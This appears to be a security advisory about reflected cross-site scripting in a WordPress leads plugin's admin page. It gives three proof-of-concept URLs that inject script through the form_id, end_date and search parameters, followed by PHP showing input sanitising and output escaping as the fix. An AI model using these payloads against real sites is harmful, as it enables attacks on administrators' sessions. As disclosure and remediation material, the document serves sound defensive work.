The plugin does not sanitise and escape various parameters, such as form_id, status, end_date, order, orderby and search, before outputting them back in the admin page.
https://example.com/wp-admin/admin.php?page=vxcf_leads&form_id=cf_5e1kpc"+style%3Danimation-name%3Arotation+onanimationstart%3Dalert(%2FXSS%2F)%2F%2F+ne97l&status&tab=entries&search&order=desc&orderby=fir+

https://example.com/wp-admin/admin.php?page=vxcf_leads&form_id=cf_5&status=&tab=entries&search=&order=asc&orderby=file-438&field=&time=&start_date=&end_date=onobw"><script>alert(1)<%2Fscript>z2u4g

https://example.com/wp-admin/admin.php?page=vxcf_leads&form_id=cf_5&status=&tab=entries&search=e67x3"onmouseover%3D"alert(1)"style%3D"position%3Aabsolute%3Bwidth%3A100%25%3Bheight%3A100%25%3Btop%3A0%3Bleft%3A0%3B"oakfc&order=asc&orderby=file-438&field=&time=&start_date=&end_date=
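
The missing handling described above, sketched as an added example (not the plugin's own code): each parameter is constrained on input and escaped again at the point of output. The function name `example_leads_read_filters`, the form markup and the YYYY-MM-DD date format are assumptions, and the code expects to run inside a WordPress admin page.

```php
<?php
// Added example: hypothetical helper, not the plugin's own code.
// Assumes WordPress is loaded (wp_unslash, sanitize_*, esc_* are core functions).

/**
 * Read the list filters from the query string, constraining each one to the
 * narrowest type that fits before it is used anywhere.
 */
function example_leads_read_filters() {
    $get = wp_unslash( $_GET );

    // Free text: reject arrays, strip tags and control characters.
    $text = static function ( $key ) use ( $get ) {
        return isset( $get[ $key ] ) && is_string( $get[ $key ] )
            ? sanitize_text_field( $get[ $key ] )
            : '';
    };

    // Dates: accept only YYYY-MM-DD (assumed format), otherwise drop the value.
    $date = static function ( $key ) use ( $text ) {
        $value = $text( $key );
        return preg_match( '/^\d{4}-\d{2}-\d{2}$/', $value ) ? $value : '';
    };

    return array(
        // Identifier-like values: lowercase letters, digits, "_" and "-" only.
        'form_id'  => sanitize_key( $text( 'form_id' ) ),
        'status'   => sanitize_key( $text( 'status' ) ),
        'orderby'  => sanitize_key( $text( 'orderby' ) ),
        // Sort direction is an allow-list of two values.
        'order'    => 'asc' === strtolower( $text( 'order' ) ) ? 'asc' : 'desc',
        'end_date' => $date( 'end_date' ),
        'search'   => $text( 'search' ),
    );
}

$f = example_leads_read_filters();
?>
<!-- Escape at output for the context the value lands in (attribute vs. text). -->
<input type="hidden" name="form_id" value="<?php echo esc_attr( $f['form_id'] ); ?>">
<input type="hidden" name="orderby" value="<?php echo esc_attr( $f['orderby'] ); ?>">
<input type="hidden" name="order" value="<?php echo esc_attr( $f['order'] ); ?>">
<input type="text" name="end_date" value="<?php echo esc_attr( $f['end_date'] ); ?>">
<input type="search" name="search" value="<?php echo esc_attr( $f['search'] ); ?>">
<p>Results for: <?php echo esc_html( $f['search'] ); ?></p>
```

Input constraints alone are not the fix: the `esc_attr()` and `esc_html()` calls at output are what keep a quote or angle bracket in any of these values from closing the attribute or opening a tag.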